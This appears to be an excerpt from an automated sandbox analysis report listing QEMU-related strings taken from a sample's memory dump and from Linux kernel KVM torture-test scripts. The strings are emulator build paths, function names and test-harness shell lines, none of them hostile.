Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_strtol
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_vcpus () {
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_irq_split
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qjson.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/optimize.c/build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/bitops.hstart >= 0 && length > 0 && length <= 64 - startnb_oargs == 1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_irq_proxy
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_thread_exit
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: aarch64_banked_spsr_indexupdate_spselhelper_msr_i_pstatehelper_access_check_cp_reghelper_access_check_cp_reghelper_exception_internalraise_exceptioncpu_has_workarm_el_is_aa64/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/helper.cRegister redefined: cp=%d %d bit crn=%d crm=%d opc1=%d opc2=%d, was %s, now %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: _ZTV16QEMUDisassembler
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/main.cextract64(env->exclusive_addr, 32, 32) == 0qemu: unhandled CPU exception 0x%x - aborting
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/helper.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_thread_join
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: protstart < endpage_set_flagsarm_el_is_aa64tb_gen_codecpu_restore_state_from_tbtb_unlocktb_lock/build/qemu-tYeErX/qemu-2.5+dfsg/cpu-exec.c/build/qemu-tYeErX/qemu-2.5+dfsg/include/qom/cpu.h/build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/rcu.hcc->set_pcTrace %p [%08x] %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/disas.cDisassembler disagrees with translator over instruction decoding
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_sem_post
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_event_reset
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_pid=$!
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_anon_ram_alloc
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: opts_accepts_any(opts)!errp || !*errpan identifierDuplicate ID '%s' for %s,id=id=%s%s%s=%s%s=%ld%s%s=%sopts != NULL/build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-option.ca non-negative number below 2^64You may use k, M, G or T suffixes for kilobytes, megabytes, gigabytes and terabytes.opt->desc && opt->desc->type == QEMU_OPT_BOOLopt->desc && opt->desc->type == QEMU_OPT_NUMBERopt->desc && opt->desc->type == QEMU_OPT_SIZEIdentifiers consist of letters, digits, '-', '.', '_', starting with a letter.!permit_abbrev || list->implied_opt_name!defaults || list->merge_listsqemu_opts_foreachqemu_opts_validateqemu_opts_validateqobject_typeqemu_opts_from_qdict_1qemu_opts_from_qdictqemu_opts_set_defaultsopts_parseqemu_opts_createqemu_opt_foreachqemu_opt_set_numberqemu_opt_set_boolopt_setqemu_opt_unsetqemu_opt_get_size_helperparse_option_numberqemu_opt_get_number_helperparse_option_boolqemu_opt_get_bool_helperqemu_opts_print_helpparse_option_size
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_thread_is_self
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_bool
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_find
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/elfload.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_set_irq
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/optimize.c
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_extend_irqs
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_anon_ram_free
Source: functions.sh0.8.dr	Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qbool.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_cond_wait
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_size_helper
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/id.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_st_i32
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: _ZN16QEMUDisassemblerD1Ev
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: thunk_convertthunk_register_struct_directthunk_register_struct/build/qemu-tYeErX/qemu-2.5+dfsg/user-exec.ccc->handle_mmu_faulthandle_cpu_signalReserved virtual address too big
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-option.c
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_STRACE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: de/build/qemu-tYeErX/qemu-2.5+dfsg/util/mmap-alloc.c!(align & (align - 1))align >= getpagesize()qemu_ram_mmap-._id_subsys_str[id]%c%s%lu%02dqdev/build/qemu-tYeErX/qemu-2.5+dfsg/util/id.cid < ARRAY_SIZE(id_subsys_str)id_generate
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_mutex_destroy
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: tcg_gen_qemu_ld_i64
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-ppc64)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qapi/qmp/qobject.h
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_st_i64
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: Please report this to qemu-devel@nongnu.org
Source: functions.sh0.8.dr	Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh0.8.dr	Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.8.dr	Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: deposit64tcg_optimize{discardset_labelmov_i32movi_i32setcond_i32movcond_i32ld8u_i32ld8s_i32ld16u_i32ld16s_i32st8_i32st16_i32add_i32sub_i32mul_i32div2_i32divu2_i32xor_i32shl_i32shr_i32sar_i32rotl_i32rotr_i32deposit_i32brcond_i32add2_i32sub2_i32mulu2_i32muls2_i32muluh_i32mulsh_i32brcond2_i32setcond2_i32ext8s_i32ext16s_i32ext8u_i32ext16u_i32bswap16_i32bswap32_i32not_i32neg_i32andc_i32orc_i32eqv_i32nand_i32nor_i32mov_i64movi_i64setcond_i64movcond_i64ld8u_i64ld8s_i64ld16u_i64ld16s_i64ld32u_i64ld32s_i64st8_i64st16_i64st32_i64add_i64sub_i64mul_i64div2_i64divu2_i64xor_i64rotl_i64rotr_i64deposit_i64ext_i32_i64extu_i32_i64extrl_i64_i32extrh_i64_i32brcond_i64ext8s_i64ext16s_i64ext32s_i64ext8u_i64ext16u_i64ext32u_i64bswap16_i64bswap32_i64bswap64_i64not_i64neg_i64andc_i64orc_i64eqv_i64nand_i64nor_i64add2_i64sub2_i64mulu2_i64muls2_i64insn_startexit_tbgoto_tbqemu_ld_i32qemu_st_i32qemu_ld_i64qemu_st_i64@C
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_module_dummy
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_vcpus
Source: functions.sh0.8.dr	Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: kvm.sh.8.dr	Binary or memory string: --qemu-cmd)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_append
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-dealloc-visitor.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/tcg.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_close
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: h2g_valid((unsigned long)host_raddr)ie->access == IOC_W*arg_type == TYPE_PTR*arg_type == TYPE_STRUCTse->convert[0] == NULL*field_types == TYPE_PTRVOIDarg_type[0] == TYPE_PTRie->access == IOC_RW/proc/self/cmdline /proc/self/maps [stack]h2g_valid(min)h2g_valid(max - 1)%ld (%s) 0%c/proc/self/%d//tmpTMPDIR%s/qemu-open.XXXXXXHost cmsg overflow
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_cond_destroy
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: _ZN16QEMUDisassemblerD0Ev
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_parse_noisily
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_oom_check
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-ppc64)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: do_qemu_set_log
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: unhandled CPU exception 0x%x - aborting
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_set
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/translate.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_find
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/fw-path-provider.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_strtoull
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate -smp qemu argument.
Source: functions.sh0.8.dr	Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/object.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_strsep
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu.sstepbits
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.8.dr	Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/internals.h
Source: kvm-recheck-rcu.sh.8.dr	Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: (UnconditionalBranchToRegister)N4vixl14DecoderVisitorEN4vixl12DisassemblerEN4vixl17PrintDisassemblerE/build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev.cUnknown device '%s' for bus '%s'Unknown device '%s' for default sysbusInitialization of device %s failed: %sgpio_list->num_out == 0 || !namegpio_list->num_in == 0 || !namen >= 0 && n < gpio_list->num_inBus '%s' does not support hotpluggingDevice '%s' does not support hotpluggingchild[%d]%s.%dhotpluggablehotplug-handlerDevice exit failed.Device initialization failed.bus != sysbus_get_default()!dev->realizedunnamed-gpio-in%s[%u]unnamed-gpio-out%s[%d]hotpluggedlegacy-%sparent_bus/machinehotplug_ctrl/unattachednon-qdev-gpio[*]device[%d]bus_get_realizedbus_set_realizedqbus_initfnqbus_finalizebus_unparentbus_unparentbus_class_initqdev_get_legacy_propertydevice_get_realizeddevice_set_realizeddevice_get_hotpluggabledevice_get_hotpluggeddevice_set_hotpluggeddevice_initfndevice_post_initdevice_finalizedevice_unparentdevice_realizedevice_unrealizedevice_class_initdevice_class_base_initdevice_resetqdev_alias_all_propertiesqdev_get_dev_pathbus_get_fw_dev_pathqbus_createqbus_realizeqdev_get_gpio_in_namedqdev_init_gpio_out_namedqdev_init_gpio_in_namedqdev_init_nofailqdev_reset_all_fnqbus_reset_oneqdev_unplugqdev_get_hotplug_handlerqdev_set_legacy_instance_idqdev_try_createqdev_fw_nameqdev_get_vmsd/build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev-properties.cprop->info == &qdev_prop_bit64Attempt to set property '%s' on device '%s' (type '%s') after it was realizedAttempt to set property '%s' on anonymous device (type '%s') after it was realizedProperty %s.%s doesn't take value %ld (minimum: %ld, maximum: %ld)Property %s.%s doesn't take value '%ld', it's not a power of 2array size property %s may not be set more than oncestrncmp(name, PROP_ARRAY_LEN_PREFIX, strlen(PROP_ARRAY_LEN_PREFIX)) == 0Attempt to set link property '%s' on device '%s' (type '%s') after it was realizedProperty '%s.%s' can't take value '%s', it's in useProperty '%s.%s' doesn't take value '%s'Property '%s.%s' can't find value '%s'prop && prop->info == &qdev_prop_ptrWarning: global %s.%s has invalid class nameWarning: global %s.%s=%s not usedWarning: global %s.%s=%s ignored (%s)Address (bus/device/function) of the host device, example: 04:10.0A power of two between 512 and 32768Slot and optional function number, example: 06.0 or 06Logical CHS translation algorithm, auto/none/lba/large/rechsEthernet 6-byte MAC Address, example: 52:54:00:12:34:56%02x:%02x:%02x:%02x:%02x:%02xprop->info == &qdev_prop_bit<unset>%02x.%x%04x:%02x:%02x.%drc == sizeof(buffer) - 1len-nullParameter '%s' expects %spci_devfn%x.%x%nprop->user_provideduint32uint16BiosAtaTranslationLostTickPolicyptruint64uint8boolon/offget_sizeset_sizeqdev_prop_set_globals_for_typeqdev_prop_check_globalsqdev_prop_set_ptrqdev_prop_finderror_set_from_qdev_prop_errorset_prop_arraylenset_prop_arraylenget_pci_host_devaddrget_pci_host_devaddrset_pci_host_devaddrset_blocksizeset_pci_devfnget_enumset_enumget_ma
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_bool_helper
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_allocate_irq
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/hotplug.c
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate qemu -append arguments
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_mutex_lock_iothread
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_UNSET_ENV
Source: bin.sh, 6777.1.00007ffda3af7000.00007ffda3b18000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: ?timestamp{ 'seconds': %ld, 'microseconds': %ld }/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qnull.cqnull_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qint.cqobject_typeqint_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qstring.cqobject_typeqstring_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qdict.c!subqdict_len || subqdict[subqdict_len - 1] == '.'e->key != NULLe->value != NULLqobject_type(obj) == type%s.%sprefix%s.%isnprintf_ret < 32qdict_size(subqdict) > 0%s%usnprintf_ret < slen%s%u.qdict_array_entriesqdict_array_splitqdict_flatten_qlistqdict_get_objqdict_get_doubleqobject_typeqobject_decrefqentry_destroyqdict_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qlist.cqobject_typeqobject_decrefqlist_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qfloat.cqobject_typeqfloat_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qbool.cqobject_typeqbool_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qjson.c\"\\\b\f\n\r\t\u%04X\u%04X
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/bitops.h
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_accept
Source: kvm.sh.8.dr	Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-i386
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: os_mem_prealloc: failed to reinstall signal handler/var!exec_dir[0]/proc/self/exepassword: cannot block signalscannot fork child processcannot unblock signalsqemu_forkqemu_init_exec_dirsocket_set_fast_reuseqemu: %s: %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_log_items
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_set_hw_version
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_create
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: kill -KILL $qemu_pid
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/disas.c
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/object.cparent->class_size <= ti->class_sizetype->instance_size >= sizeof(Object)%s:%d:%s: Object %p is not an instance of type %s
Source: functions.sh0.8.dr	Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.8.dr	Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_SINGLESTEP
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_set_log_filename
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_log
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qdict.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_thread_create
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_socket
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_thread_get_self
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: cpu_write_elf64_qemunote
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: opt->desc && opt->desc->type == QEMU_OPT_SIZE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu,unknown
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: halted runningT%02xthread:%02x;ContvCont;c;C;s;ST02E22E14qemu.sstepbitsENABLE=%x,NOIRQ=%x,NOTIMER=%xqemu.sstepQC1fThreadInfosThreadInfom%xThreadExtraInfo,CPU#%d [%s]OffsetsText=%08x;Data=%08x;Bss=%08xSupportedPacketSize=%x;qXfer:features:read+Xfer:features:read:target.xml<xi:include href=""/></target>AttachedW%02xS%02x%08x/%xX%02xlistenaccept(#
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_module_dummy%s/..block-iscsiblock-curlblock-rbdblock-dmgModule is not supported by system.
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/rcu.c
Source: functions.sh0.8.dr	Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.8.dr	Binary or memory string: --qemu-args|--qemu-arg)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_ARGV0
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_event_wait
Source: functions.sh0.8.dr	Binary or memory string: echo $TORTURE_QEMU_CMD
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qom/cpu.h
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/main.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_bool_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: marvell,xscaleintel,sa1100arm,arm11mpcorearm,arm1176arm,arm1136arm,arm946arm,arm926%s-arm-cpuqemu,unknownarm,cortex-a15arm,cortex-a9arm,cortex-a8arm,arm1026oldvalue == newvaluestart-powered-offpsci-conduitmidrarm1136-r2cortex-m3cortex-m4cortex-r5ti925tsa1110pxa250pxa255pxa260pxa261pxa262pxa270pxa270-a0pxa270-a1pxa270-b0pxa270-b1pxa270-c0pxa270-c5L2ECTLRA9_PWRCTLA9_DIAGA9_PWRDIAGNEONBUSYTLB_LOCKRTLB_LOCKWTLB_VATLB_PATLB_ATTRL2LOCKDOWNL2AUXCRATCMBTCMpmsav7-dregionhas-mpuhas_el3rvbarreset-hivecsreset-cbar
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_host_page_size
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_set_cloexec
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/arm-semi.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_thread_joinqemu_thread_createqemu_sem_waitqemu_sem_timedwaitqemu_sem_postqemu_sem_destroyqemu_sem_initqemu_cond_waitqemu_cond_broadcastqemu_cond_signalqemu_cond_destroyqemu_cond_initqemu_mutex_unlockqemu_mutex_lockqemu_mutex_destroyqemu_mutex_init/build/qemu-tYeErX/qemu-2.5+dfsg/util/envlist.cenvlist != NULLenvlist_free.so%s/%s%sQTAILQ_EMPTY(&dso_init_list)Failed to open module: %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: uncaught target signal %d (%s) - %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/signal.cdo_sigprocmaskw
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_UNAME
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_init_vcpu
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: uleb128_encode_smallqemu_strtosz_suffix_unitbuffer_is_zerobuffer_find_nonzero_offset/build/qemu-tYeErX/qemu-2.5+dfsg/util/cutils.ccan_use_buffer_find_nonzero_offset(buf, len)len % (4 * sizeof(long)) == 0mul >= 0n <= 0x3fffwarning: %s not in [0, %d]
Source: functions.sh0.8.dr	Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/user-exec.c
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/error.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_number_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_memalign
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_strtoll
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu builddir
